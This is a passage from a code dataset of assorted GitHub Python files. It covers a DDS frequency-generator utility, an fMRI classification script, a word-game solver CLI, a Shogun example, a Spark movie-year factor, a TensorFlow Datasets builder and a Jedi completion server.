self.sys_clock\r\n else:\r\n self.ctl_byte &= 0xFE\r\n self.clock_freq = self.sys_clock\r\n\r\n self.set_freq(self.frequency)\r\n return True\r\n \r\n def set_phase_shift(self, n):\r\n self.phase_shift = n\r\n self.ctl_byte = (self.ctl_byte & 0x07 | n << 3) & self.ctl_mask\r\n self.iface.write_reg(self.freq_word, self.ctl_byte)\r\n return True\r\n\r\n def set_reg_vals(self):\r\n print(f\"{self.ctl_byte:02X} {self.freq_word:08X}\")\r\n self.iface.write_reg(self.freq_word, self.ctl_byte)\r\n return True\r\n\r\nclass AD9851(AD98x): # parameters for AD9851\r\n ic_name = 'AD9851'\r\n sys_clock = AD9851_clock\r\n \r\n def __init__(self, iface):\r\n super().__init__(iface)\r\n self.ctl_byte = 0x01 # set multiplier bit\r\n self.clock_freq = 6 * self.sys_clock\r\n self.ctl_mask = 0xFD # to ensure ctrl bit 1 == 0\r\n self.set_freq(start_freq)\r\n \r\nclass AD9850(AD98x): # parameters for AD9850\r\n ic_name = 'AD9850'\r\n sys_clock = AD9850_clock\r\n \r\n def __init__(self, iface):\r\n super().__init__(iface)\r\n self.ctl_byte = 0x0\r\n self.ctl_mask = 0xFC # to ensure ctrl bit 0 and 1 == 0\r\n self.set_freq(start_freq)\r\n\r\n def set_multiplier(self, n):\r\n print(\"Error: multiplier bit not allowed for \", AD9850.ic_name)\r\n return True\r\n \r\n#=======================\r\n\r\ndef main():\r\n if pin_factory != \"rpigpio\":\r\n os.environ[\"GPIOZERO_PIN_FACTORY\"] = pin_factory\r\n os.environ[\"PIGPIO_ADDR\"] = ip_addr\r\n 
else:\r\n pass # do nothing - rpigpio is default pin factory\r\n \r\n # system interface A or B: logical functions AD98x and low level IO\r\n\r\n if VCO_A == \"AD9851\":\r\n sif_A = AD9851(GpioADxIf(gif_A))\r\n else:\r\n sif_A = AD9850(GpioADxIf(gif_A)) \r\n\r\n if VCO_B != None:\r\n if VCO_B == \"AD9851\":\r\n sif_B = AD9851(GpioADxIf(gif_B)) # sif system interface RPi - VCO\r\n else:\r\n sif_B = AD9850(GpioADxIf(gif_B))\r\n \r\n ## user interface\r\n uif = parse(sif_A, sif_B)\r\n # start program\r\n uif.get_cmd()\r\n \r\nif __name__ =='__main__':\r\n main()\r\n","repo_name":"Bevedel/AD985x-Utility","sub_path":"AD985x.py","file_name":"AD985x.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"440201545","text":"from pydoc import doc\nimport pandas as pd\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nimport matplotlib.pyplot as plt\n#from gensim.models import KeyedVectors\nimport pickle as pk\nimport nibabel as nib\nimport pandas as pd\nimport numpy as np\nimport random\nfrom scipy import stats\nfrom statsmodels.stats.multitest import multipletests\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport sys\nfrom sklearn.linear_model import Ridge\nfrom sklearn.utils import shuffle\nimport argparse\nimport sys\nfrom sklearn.linear_model import RidgeCV\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy import stats\nfrom sklearn.model_selection import LeaveOneOut\nimport time\nimport os.path\nfrom sklearn.model_selection import StratifiedShuffleSplit \nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nimport seaborn as sns\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.utils import shuffle\nfrom ast import literal_eval\n\n\ndef cross_validaton_logreg(X, y):\n \n \n X, y = shuffle(X, y)\n best_alphas = []\n results = []\n precision = []\n recall = []\n cm = []\n y_tests, y_preds = [], []\n \n for i in range(5):\n test_indices = np.random.random_integers(0, 159, 32)\n train_indices = list(range(0,160))\n for index in sorted(test_indices, reverse = True):\n del train_indices[index]\n \n X_train, X_test = [], []\n y_train, y_test = [], []\n\n for index in train_indices:\n X_train.append(X[index])\n y_train.append(y[index])\n\n for index in test_indices:\n X_test.append(X[index])\n y_test.append(y[index])\n \n model = LogisticRegression(class_weight='balanced', random_state=i,solver = 'lbfgs', penalty = 'l2',max_iter=500, n_jobs=-1)\n scoring = 'accuracy'\n ridge_params = {'C': [0.001,0.01, 0.1, 1, 10, 100,1000]}\n clf = GridSearchCV(model, ridge_params, scoring=scoring, n_jobs=-1, cv=4)\n\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n \n pca = PCA(n_components = 0.85)\n pca.fit(X_train)\n X_train = pca.transform(X_train)\n X_test = pca.transform(X_test)\n\n clf.fit(X_train,y_train)\n best_alphas.append(clf.best_params_)\n print(clf.best_params_)\n y_pred = clf.predict(X_test)\n\n testScore = metrics.accuracy_score(y_test, y_pred)\n precision_score = metrics.precision_score(y_test, y_pred, average = 'weighted')\n recall_score = metrics.recall_score(y_test, y_pred, average = 'weighted')\n\n results.append(testScore)\n precision.append(precision_score)\n recall.append(recall_score)\n\n 
print(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n print(\"Precision:\",precision_score)\n print(\"Recall:\",recall_score)\n\n #Confusion Matrix\n cnf_matrix = metrics.confusion_matrix(y_test, y_pred, normalize = 'true')\n print(cnf_matrix)\n cm.append(cnf_matrix)\n y_tests.append(y_test)\n y_preds.append(y_pred)\n \n y_tests = np.array(y_tests)\n y_preds = np.array(y_preds)\n \n cm = np.array(cm)\n \n return y_tests,y_preds, cm\n\ncontrol_p = ['P054','P057','P064','P065','P067','P068','P072','P073','P075','P076','P080','P081']\nASD_p = ['P050','P055','P056','P059','P069','P070','P071','P078','P079']\nall_participants = sorted(ASD_p + control_p)\n\nbeta_dir = '/home/varshini/projects/def-afyshe-ab/varshini/glucks/data/results_betas/betas_all/'\nout_dir = 'clf_apr_18'\noutput_dir = '/home/varshini/projects/def-afyshe-ab/varshini/glucks/clf_jul/' + out_dir + '/'\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ncorr_dir = output_dir\ngroup = all_participants\nreg_names = ['AG','IFG','ROI','dACC']\nclass_labels = [0]*80 + [1]*40 + [2]*20 + [3]*20\n# LT LF M SM\n\nfor participant in group:\n\n print(participant)\n p_start = time.time()\n \n with open(beta_dir + 'all_betas_' + participant + '.pkl','rb') as f:\n all_betas = pk.load(f)\n \n #ROI\n X, y = all_betas[2], class_labels\n \n file_name_pred = output_dir + participant + '_' + reg_names[2] +'_pred.pkl'\n file_name_true = output_dir + participant + '_' + reg_names[2] +'_true.pkl'\n file_name_cm = output_dir + participant + '_' + reg_names[2] +'_cm.pkl'\n\n y_tests, y_preds, cm = cross_validaton_logreg(X,y)\n with open(file_name_pred,'wb') as f:\n pk.dump(y_preds, f)\n\n with open(file_name_true,'wb') as f:\n pk.dump(y_tests, f)\n\n with open(file_name_cm,'wb') as f:\n pk.dump(cm, f)\n \n\n\n\n","repo_name":"varshini-prakash/thesis_glucksberg","sub_path":"old_clf.py","file_name":"old_clf.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22755317124","text":"import solver\nfrom solver import GuessState, join_by_coma\nfrom words import WORDS\n\nfrom random import sample\nimport typer\n\napp = typer.Typer()\n\n\n@app.command()\ndef start():\n \"\"\"Sugguest initial guess.\"\"\"\n typer.echo(\"\".join(solver.startword(WORDS)))\n\n\n@app.command()\ndef nextGuess(\n pattern: str,\n exclude: str = None,\n include: str = None,\n posExclude: str = None,\n single: bool = False,\n print: bool = False,\n):\n \"\"\"Suggest next guess based on current state.\"\"\"\n posExcludeDict = solver.string_param_to_dict(posExclude)\n hints = filter(lambda x: solver.match(pattern, x), WORDS)\n hints = filter(lambda x: solver.excludes(exclude, x), hints)\n hints = filter(lambda x: solver.has(include, x), hints)\n hints = filter(lambda x: solver.not_at(posExcludeDict, x), hints)\n hints = list(sorted(hints))\n result = []\n if single and hints:\n result = [\",\".join(sample(hints, 1)[0])]\n else:\n result = [\",\".join(hint) for hint in hints]\n if print:\n typer.echo(\"\\n\".join(result))\n return result\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"cinegemadar/szozat-solver","sub_path":"solver_cli.py","file_name":"solver_cli.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22296112601","text":"#!/usr/bin/env python\nimport shogun as sg\n\nstrings=['example document 1','example document 2','example document 
3','example document 4']\n\nparameter_list=[[strings]]\n\ndef converter_hasheddoc(strings):\n\t#create string features\n\tf=sg.create_string_features(strings, sg.RAWBYTE, sg.PT_CHAR)\n\n\t#set the number of bits of the target dimension\n\t#means a dim of size 2^5=32\n\tnum_bits=5\n\n\t#create the ngram tokenizer of size 8 to parse the strings\n\ttokenizer=sg.NGramTokenizer(8)\n\n\t#normalize results\n\tnormalize=True\n\n\t#create converter\n\tconverter = sg.create_transformer('HashedDocConverter', tokenizer=tokenizer, num_bits=num_bits, should_normalize=normalize)\n\n\tconverted_feats=converter.transform(f)\n\n\t#should expect 32\n\t#print('Converted features\\' space dimensionality is', converted_feats.get_dim_feature_space())\n\n\t#print('Self dot product of string 0 with converted feats:', converted_feats.dot(0, converted_feats, 0))\n\n\thashed_feats=sg.create_features(\"HashedDocDotFeatures\", num_bits=num_bits, \n\t\t\t\t\t\t\t\t\tdoc_collection=f, tokenizer=tokenizer, \n\t\t\t\t\t\t\t\t\tshould_normalize=normalize)\n\n\t#print('Hashed features\\' space dimensionality is', hashed_feats.get_dim_feature_space())\n\n\t#print('Self dot product of string 0 with hashed feats:', hashed_feats.dot(0, hashed_feats, 0))\n\n\treturn converted_feats\n\nif __name__=='__main__':\n\tprint('HashedDocConverter')\n\tconverter_hasheddoc(*parameter_list[0])\n\n\n","repo_name":"shogun-toolbox/shogun","sub_path":"examples/undocumented/python/converter_hasheddoc.py","file_name":"converter_hasheddoc.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":2975,"dataset":"github-code","pt":"75"} +{"seq_id":"678686330","text":"from utils.spark_app import MovieDataApp\n\n\nspark = MovieDataApp().spark\n\ndef get_movie_year_factor(cate_id):\n movie_data = spark.sql(\"select * from movie.db_asset\").select('id', 'year')\n import numpy as np\n from datetime import datetime\n now_year = datetime.today().year\n\n def extract_movie_year(row):\n try:\n movie_year = int(row.year)\n if movie_year <= 0 or movie_year > now_year:\n movie_year = now_year - 5 # 认为没有year的电影可能不是特别新的和重要的,适当的 -5\n except:\n movie_year = now_year - 5 # 对没有year或者year异常的(0或者大于2020)给一个适合的year(自选一个)\n deltayear = now_year - movie_year\n\n # 衰减因子\n if cate_id == 1971:\n # 采用以2为底的对数,在接近当前年份时,放大衰减系数,远离目前年份时趋于稳定(e和10为底的衰减速率太慢)\n # 采用大的衰减速率有利于 增大近期综艺的权重,(认为综艺时效性很重要,去年的综艺看的人很少)\n year_exp = 1 / (np.log2(deltayear + 1) + 1)\n else:\n # 采用指数加权,调整指数范围大概在 2^0.1 ~ 2^5 (1970~2020)之间,即 1 ~ 32 倍,选2为底防止倍数放大太多\n # 指数加权,可以使年代久的电影权重偏低更多\n year_exp = 1 / (2 ** (deltayear / 10)) # 为了使指数域在0.1~5,对 deltayear 除以10\n return row.id, row.year, round(float(year_exp), 4)\n\n tmp_table = movie_data.rdd.map(extract_movie_year).toDF(['movie_id', 'year', 'factor'])\n\n return tmp_table","repo_name":"hfhfn/db_recommend","sub_path":"online_recommend/stat_factor/movie_year.py","file_name":"movie_year.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42634393060","text":"\"\"\"Data sets of the Multi-Dimensional Signal Processing Research Group (MDSP) for Video\nSuper-Resolution.\"\"\"\n\nimport numpy as np\nimport scipy.io\nimport tensorflow_datasets as tfds\n\n_DESCRIPTION = \"\"\"\nThe data sets have been gathered during the past several years in the Multi-Dimensional Signal\nProcessing Research Group (MDSP).\n\"\"\"\n\n_CITATION = \"\"\"\n@misc{mdsp_milanfar,\n title={Peyman Milanfar},\n 
url={http://www.soe.ucsc.edu/~milanfar/software/sr-datasets.html},\n journal={MDSP Super-Resolution And Demosaicing Datasets :: Peyman Milanfar}\n}\n\"\"\"\n\nNAMES = {\n \"face_adyoron_1\": \"Color Face 1\",\n \"face_adyoron_2\": \"Color Face 2\",\n \"Adyoron_small\": \"Surveillance (Small)\",\n \"Book_case1_small\": \"Bookcase 1 (Small)\",\n \"Book_case1\": \"Bookcase 1\",\n}\nDOWNLOAD_PATHS = {\n k: f\"https://users.soe.ucsc.edu/~milanfar/software/datasets/{k}.mat\"\n for k in NAMES.keys()\n}\n\n\nclass MdspColorSr(tfds.core.GeneratorBasedBuilder):\n \"\"\"DatasetBuilder for mdsp_color_sr dataset.\"\"\"\n\n VERSION = tfds.core.Version(\"0.0.1\")\n RELEASE_NOTES = {\n \"0.0.1\": \"Alpha release.\",\n }\n\n def _info(self) -> tfds.core.DatasetInfo:\n \"\"\"Returns the dataset metadata.\"\"\"\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(\n {\n \"video\": tfds.features.Video(shape=(None, None, None, 3)),\n }\n ),\n homepage=\"https://users.soe.ucsc.edu/~milanfar/software/sr-datasets.html\",\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager: tfds.download.DownloadManager):\n \"\"\"Returns SplitGenerators.\"\"\"\n paths = dl_manager.download(DOWNLOAD_PATHS)\n\n return {\n \"test\": self._generate_examples(paths),\n }\n\n def _generate_examples(self, paths):\n \"\"\"Yields examples.\"\"\"\n for key, path in paths.items():\n video = scipy.io.loadmat(path)\n video = video[key]\n video = np.transpose(video, axes=[3, 0, 1, 2])\n print(video.dtype)\n yield NAMES[key], {\"video\": video}\n","repo_name":"HedgehogCode/tensorflow-datasets-bw","sub_path":"tensorflow_datasets_bw/mdsp_color_sr/mdsp_color_sr.py","file_name":"mdsp_color_sr.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"75300288563","text":"import os\nimport io\nimport re\nimport sys\nimport json\nimport traceback\nimport platform\n\njediPreview = False\n\nclass RedirectStdout(object):\n def __init__(self, new_stdout=None):\n \"\"\"If stdout is None, redirect to /dev/null\"\"\"\n self._new_stdout = new_stdout or open(os.devnull, 'w')\n\n def __enter__(self):\n sys.stdout.flush()\n self.oldstdout_fno = os.dup(sys.stdout.fileno())\n os.dup2(self._new_stdout.fileno(), 1)\n\n def __exit__(self, exc_type, exc_value, traceback):\n self._new_stdout.flush()\n os.dup2(self.oldstdout_fno, 1)\n os.close(self.oldstdout_fno)\n\nclass JediCompletion(object):\n basic_types = {\n 'module': 'import',\n 'instance': 'variable',\n 'statement': 'value',\n 'param': 'variable',\n }\n\n def __init__(self):\n self.default_sys_path = sys.path\n self.environment = jedi.api.environment.Environment(sys.prefix, sys.executable)\n self._input = io.open(sys.stdin.fileno(), encoding='utf-8')\n if (os.path.sep == '/') and (platform.uname()[2].find('Microsoft') > -1):\n # WSL; does not support UNC paths\n self.drive_mount = '/mnt/'\n elif sys.platform == 'cygwin':\n # cygwin\n self.drive_mount = '/cygdrive/'\n else:\n # Do no normalization, e.g. 
Windows build of Python.\n # Could add additional test: ((os.path.sep == '/') and os.path.isdir('/mnt/c'))\n # However, this may have more false positives trying to identify Windows/*nix hybrids\n self.drive_mount = ''\n\n def _get_definition_type(self, definition):\n # if definition.type not in ['import', 'keyword'] and is_built_in():\n # return 'builtin'\n try:\n if definition.type in ['statement'] and definition.name.isupper():\n return 'constant'\n return self.basic_types.get(definition.type, definition.type)\n except Exception:\n return 'builtin'\n\n def _additional_info(self, completion):\n \"\"\"Provide additional information about the completion object.\"\"\"\n if not hasattr(completion, '_definition') or completion._definition is None:\n return ''\n if completion.type == 'statement':\n nodes_to_display = ['InstanceElement', 'String', 'Node', 'Lambda',\n 'Number']\n return ''.join(c.get_code() for c in\n completion._definition.children if type(c).__name__\n in nodes_to_display).replace('\\n', '')\n return ''\n\n @classmethod\n def _get_top_level_module(cls, path):\n \"\"\"Recursively walk through directories looking for top level module.\n\n Jedi will use current filepath to look for another modules at same\n path, but it will not be able to see modules **above**, so our goal\n is to find the higher python module available from filepath.\n \"\"\"\n _path, _ = os.path.split(path)\n if os.path.isfile(os.path.join(_path, '__init__.py')):\n return cls._get_top_level_module(_path)\n return path\n\n def _generate_signature(self, completion):\n \"\"\"Generate signature with function arguments.\n \"\"\"\n if completion.type in ['module'] or not hasattr(completion, 'params'):\n return ''\n return '%s(%s)' % (\n completion.name,\n ', '.join(p.description[6:] for p in completion.params if p))\n\n def _get_call_signatures(self, script):\n \"\"\"Extract call signatures from jedi.api.Script object in failsafe way.\n\n Returns:\n Tuple with original signature object, name and value.\n \"\"\"\n _signatures = []\n try:\n call_signatures = script.call_signatures()\n except KeyError:\n call_signatures = []\n except :\n call_signatures = []\n for signature in call_signatures:\n for pos, param in enumerate(signature.params):\n if not param.name:\n continue\n\n name = self._get_param_name(param)\n if param.name == 'self' and pos == 0:\n continue\n if name.startswith('*'):\n continue\n\n value = self._get_param_value(param)\n _signatures.append((signature, name, value))\n return _signatures\n\n def _get_param_name(self, p):\n if(p.name.startswith('param ')):\n return p.name[6:] # drop leading 'param '\n return p.name\n\n def _get_param_value(self, p):\n pair = p.description.split('=')\n if(len(pair) > 1):\n return pair[1]\n return None\n\n def _get_call_signatures_with_args(self, script):\n \"\"\"Extract call signatures from jedi.api.Script object in failsafe way.\n\n Returns:\n Array with dictionary\n \"\"\"\n _signatures = []\n try:\n call_signatures = script.call_signatures()\n except KeyError:\n call_signatures = []\n for signature in call_signatures:\n sig = {\"name\": \"\", \"description\": \"\", \"docstring\": \"\",\n \"paramindex\": 0, \"params\": [], \"bracketstart\": []}\n sig[\"description\"] = signature.description\n try:\n sig[\"docstring\"] = signature.docstring()\n sig[\"raw_docstring\"] = signature.docstring(raw=True)\n except Exception:\n sig[\"docstring\"] = ''\n sig[\"raw_docstring\"] = ''\n\n sig[\"name\"] = signature.name\n sig[\"paramindex\"] = signature.index\n 
sig[\"bracketstart\"].append(signature.index)\n\n _signatures.append(sig)\n for pos, param in enumerate(signature.params):\n if not param.name:\n continue\n\n name = self._get_param_name(param)\n if param.name == 'self' and pos == 0:\n continue\n\n value = self._get_param_value(param)\n paramDocstring = ''\n try:\n paramDocstring = param.docstring()\n except Exception:\n paramDocstring = ''\n\n sig[\"params\"].append({\"name\": name, \"value\": value, \"docstring\": paramDocstring, \"description\": param.description})\n return _signatures\n\n def _serialize_completions(self, script, identifier=None, prefix=''):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n script: Instance of jedi.api.Script object.\n identifier: Unique completion identifier to pass back to VSCode.\n prefix: String with prefix to filter function arguments.\n Used only when fuzzy matcher turned off.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n _completions = []\n\n for signature, name, value in self._get_call_signatures(script):\n if not self.fuzzy_matcher and not name.lower().startswith(\n prefix.lower()):\n continue\n _completion = {\n 'type': 'property',\n 'raw_type': '',\n 'rightLabel': self._additional_info(signature)\n }\n _completion['description'] = ''\n _completion['raw_docstring'] = ''\n\n # we pass 'text' here only for fuzzy matcher\n if value:\n _completion['snippet'] = '%s=${1:%s}$0' % (name, value)\n _completion['text'] = '%s=' % (name)\n else:\n _completion['snippet'] = '%s=$1$0' % name\n _completion['text'] = name\n _completion['displayText'] = name\n _completions.append(_completion)\n\n try:\n completions = script.completions()\n except KeyError:\n completions = []\n except :\n completions = []\n for completion in completions:\n try:\n _completion = {\n 'text': completion.name,\n 'type': self._get_definition_type(completion),\n 'raw_type': completion.type,\n 'rightLabel': self._additional_info(completion)\n }\n except Exception:\n continue\n\n for c in _completions:\n if c['text'] == _completion['text']:\n c['type'] = _completion['type']\n c['raw_type'] = _completion['raw_type']\n\n if any([c['text'].split('=')[0] == _completion['text']\n for c in _completions]):\n # ignore function arguments we already have\n continue\n _completions.append(_completion)\n return json.dumps({'id': identifier, 'results': _completions})\n\n def _serialize_methods(self, script, identifier=None, prefix=''):\n _methods = []\n try:\n completions = script.completions()\n except KeyError:\n return []\n\n for completion in completions:\n if completion.name == '__autocomplete_python':\n instance = completion.parent().name\n break\n else:\n instance = 'self.__class__'\n\n for completion in completions:\n params = []\n if hasattr(completion, 'params'):\n params = [p.description for p in completion.params if p]\n if completion.parent().type == 'class':\n _methods.append({\n 'parent': completion.parent().name,\n 'instance': instance,\n 'name': completion.name,\n 'params': params,\n 'moduleName': completion.module_name,\n 'fileName': completion.module_path,\n 'line': completion.line,\n 'column': completion.column,\n })\n return json.dumps({'id': identifier, 'results': _methods})\n\n def _serialize_arguments(self, script, identifier=None):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n script: Instance of jedi.api.Script object.\n identifier: Unique completion identifier to pass back to VSCode.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n return json.dumps({\"id\": 
identifier, \"results\": self._get_call_signatures_with_args(script)})\n\n def _top_definition(self, definition):\n for d in definition.goto_assignments():\n if d == definition:\n continue\n if d.type == 'import':\n return self._top_definition(d)\n else:\n return d\n return definition\n\n def _extract_range_jedi_0_11_1(self, definition):\n from parso.utils import split_lines\n # get the scope range\n try:\n if definition.type in ['class', 'function']:\n tree_name = definition._name.tree_name\n scope = tree_name.get_definition()\n start_line = scope.start_pos[0] - 1\n start_column = scope.start_pos[1]\n # get the lines\n code = scope.get_code(include_prefix=False)\n lines = split_lines(code)\n # trim the lines\n lines = '\\n'.join(lines).rstrip().split('\\n')\n end_line = start_line + len(lines) - 1\n end_column = len(lines[-1]) - 1\n else:\n symbol = definition._name.tree_name\n start_line = symbol.start_pos[0] - 1\n start_column = symbol.start_pos[1]\n end_line = symbol.end_pos[0] - 1\n end_column = symbol.end_pos[1]\n return {\n 'start_line': start_line,\n 'start_column': start_column,\n 'end_line': end_line,\n 'end_column': end_column\n }\n except Exception as e:\n return {\n 'start_line': definition.line - 1,\n 'start_column': definition.column,\n 'end_line': definition.line - 1,\n 'end_column': definition.column\n }\n\n def _extract_range(self, definition):\n \"\"\"Provides the definition range of a given definition\n\n For regular symbols it returns the start and end location of the\n characters making up the symbol.\n\n For scoped containers it will return the entire definition of the\n scope.\n\n The scope that jedi provides ends with the first character of the next\n scope so it's not ideal. For vscode we need the scope to end with the\n last character of actual code. 
That's why we extract the lines that\n make up our scope and trim the trailing whitespace.\n \"\"\"\n return self._extract_range_jedi_0_11_1(definition)\n\n def _get_definitionsx(self, definitions, identifier=None, ignoreNoModulePath=False):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n definitions: List of jedi.api.classes.Definition objects.\n identifier: Unique completion identifier to pass back to VSCode.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n _definitions = []\n for definition in definitions:\n try:\n if definition.type == 'import':\n definition = self._top_definition(definition)\n definitionRange = {\n 'start_line': 0,\n 'start_column': 0,\n 'end_line': 0,\n 'end_column': 0\n }\n module_path = ''\n if hasattr(definition, 'module_path') and definition.module_path:\n module_path = definition.module_path\n definitionRange = self._extract_range(definition)\n else:\n if not ignoreNoModulePath:\n continue\n try:\n parent = definition.parent()\n container = parent.name if parent.type != 'module' else ''\n except Exception:\n container = ''\n\n try:\n docstring = definition.docstring()\n rawdocstring = definition.docstring(raw=True)\n except Exception:\n docstring = ''\n rawdocstring = ''\n _definition = {\n 'text': definition.name,\n 'type': self._get_definition_type(definition),\n 'raw_type': definition.type,\n 'fileName': module_path,\n 'container': container,\n 'range': definitionRange,\n 'description': definition.description,\n 'docstring': docstring,\n 'raw_docstring': rawdocstring,\n 'signature': self._generate_signature(definition)\n }\n _definitions.append(_definition)\n except Exception as e:\n pass\n return _definitions\n\n def _serialize_definitions(self, definitions, identifier=None):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n definitions: List of jedi.api.classes.Definition objects.\n identifier: Unique completion identifier to pass back to VSCode.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n _definitions = []\n for definition in definitions:\n try:\n if definition.module_path:\n if definition.type == 'import':\n definition = self._top_definition(definition)\n if not definition.module_path:\n continue\n try:\n parent = definition.parent()\n container = parent.name if parent.type != 'module' else ''\n except Exception:\n container = ''\n\n try:\n docstring = definition.docstring()\n rawdocstring = definition.docstring(raw=True)\n except Exception:\n docstring = ''\n rawdocstring = ''\n _definition = {\n 'text': definition.name,\n 'type': self._get_definition_type(definition),\n 'raw_type': definition.type,\n 'fileName': definition.module_path,\n 'container': container,\n 'range': self._extract_range(definition),\n 'description': definition.description,\n 'docstring': docstring,\n 'raw_docstring': rawdocstring\n }\n _definitions.append(_definition)\n except Exception as e:\n pass\n return json.dumps({'id': identifier, 'results': _definitions})\n\n def _serialize_tooltip(self, definitions, identifier=None):\n _definitions = []\n for definition in definitions:\n signature = definition.name\n description = None\n if definition.type in ['class', 'function']:\n signature = self._generate_signature(definition)\n try:\n description = definition.docstring(raw=True).strip()\n except Exception:\n description = ''\n if not description and not hasattr(definition, 'get_line_code'):\n # jedi returns an empty string for compiled objects\n description = definition.docstring().strip()\n if definition.type == 
'module':\n signature = definition.full_name\n try:\n description = definition.docstring(raw=True).strip()\n except Exception:\n description = ''\n if not description and hasattr(definition, 'get_line_code'):\n # jedi returns an empty string for compiled objects\n description = definition.docstring().strip()\n _definition = {\n 'type': self._get_definition_type(definition),\n 'text': definition.name,\n 'description': description,\n 'docstring': description,\n 'signature': signature\n }\n _definitions.append(_definition)\n return json.dumps({'id': identifier, 'results': _definitions})\n\n def _serialize_usages(self, usages, identifier=None):\n _usages = []\n for usage in usages:\n _usages.append({\n 'name': usage.name,\n 'moduleName': usage.module_name,\n 'fileName': usage.module_path,\n 'line': usage.line,\n 'column': usage.column,\n })\n return json.dumps({'id': identifier, 'results': _usages})\n\n def _deserialize(self, request):\n \"\"\"Deserialize request from VSCode.\n\n Args:\n request: String with raw request from VSCode.\n\n Returns:\n Python dictionary with request data.\n \"\"\"\n return json.loads(request)\n\n def _set_request_config(self, config):\n \"\"\"Sets config values for current request.\n\n This includes sys.path modifications which is getting restored to\n default value on each request so each project should be isolated\n from each other.\n\n Args:\n config: Dictionary with config values.\n \"\"\"\n sys.path = self.default_sys_path\n self.use_snippets = config.get('useSnippets')\n self.show_doc_strings = config.get('showDescriptions', True)\n self.fuzzy_matcher = config.get('fuzzyMatcher', False)\n jedi.settings.case_insensitive_completion = config.get(\n 'caseInsensitiveCompletion', True)\n for path in config.get('extraPaths', []):\n if path and path not in sys.path:\n sys.path.insert(0, path)\n\n def _normalize_request_path(self, request):\n \"\"\"Normalize any Windows paths received by a *nix build of\n Python. Does not alter the reverse os.path.sep=='\\\\',\n i.e. 
*nix paths received by a Windows build of Python.\n \"\"\"\n if 'path' in request:\n if not self.drive_mount:\n return\n newPath = request['path'].replace('\\\\', '/')\n if newPath[0:1] == '/':\n # is absolute path with no drive letter\n request['path'] = newPath\n elif newPath[1:2] == ':':\n # is path with drive letter, only absolute can be mapped\n request['path'] = self.drive_mount + newPath[0:1].lower() + newPath[2:]\n else:\n # is relative path\n request['path'] = newPath\n\n def _process_request(self, request):\n \"\"\"Accept serialized request from VSCode and write response.\n \"\"\"\n request = self._deserialize(request)\n\n self._set_request_config(request.get('config', {}))\n\n self._normalize_request_path(request)\n path = self._get_top_level_module(request.get('path', ''))\n if len(path) > 0 and path not in sys.path:\n sys.path.insert(0, path)\n lookup = request.get('lookup', 'completions')\n\n if lookup == 'names':\n return self._serialize_definitions(\n jedi.api.names(\n source=request.get('source', None),\n path=request.get('path', ''),\n all_scopes=True),\n request['id'])\n\n script = jedi.Script(\n source=request.get('source', None), line=request['line'] + 1,\n column=request['column'], path=request.get('path', ''),\n sys_path=sys.path, environment=self.environment)\n\n if lookup == 'definitions':\n defs = self._get_definitionsx(script.goto_assignments(follow_imports=True), request['id'])\n return json.dumps({'id': request['id'], 'results': defs})\n if lookup == 'tooltip':\n if jediPreview:\n defs = []\n try:\n defs = self._get_definitionsx(script.goto_definitions(), request['id'], True)\n except:\n pass\n try:\n if len(defs) == 0:\n defs = self._get_definitionsx(script.goto_assignments(), request['id'], True)\n except:\n pass\n return json.dumps({'id': request['id'], 'results': defs})\n else:\n try:\n return self._serialize_tooltip(script.goto_definitions(), request['id'])\n except:\n return json.dumps({'id': request['id'], 'results': []})\n elif lookup == 'arguments':\n return self._serialize_arguments(\n script, request['id'])\n elif lookup == 'usages':\n return self._serialize_usages(\n script.usages(), request['id'])\n elif lookup == 'methods':\n return self._serialize_methods(script, request['id'],\n request.get('prefix', ''))\n else:\n return self._serialize_completions(script, request['id'],\n request.get('prefix', ''))\n\n def _write_response(self, response):\n sys.stdout.write(response + '\\n')\n sys.stdout.flush()\n\n def watch(self):\n while True:\n try:\n rq = self._input.readline()\n if len(rq) == 0:\n # Reached EOF - indication our parent process is gone.\n sys.stderr.write('Received EOF from the standard input,exiting' + '\\n')\n sys.stderr.flush()\n return\n with RedirectStdout():\n response = self._process_request(rq)\n self._write_response(response)\n\n except Exception:\n sys.stderr.write(traceback.format_exc() + '\\n')\n sys.stderr.flush()\n\nif __name__ == '__main__':\n cachePrefix = 'v'\n modulesToLoad = ''\n if len(sys.argv) > 2 and sys.argv[1] == 'custom':\n jediPath = sys.argv[2]\n jediPreview = True\n cachePrefix = 'custom_v'\n if len(sys.argv) > 3:\n modulesToLoad = sys.argv[3]\n else:\n #release\n jediPath = os.path.dirname(__file__)\n if len(sys.argv) > 1:\n modulesToLoad = 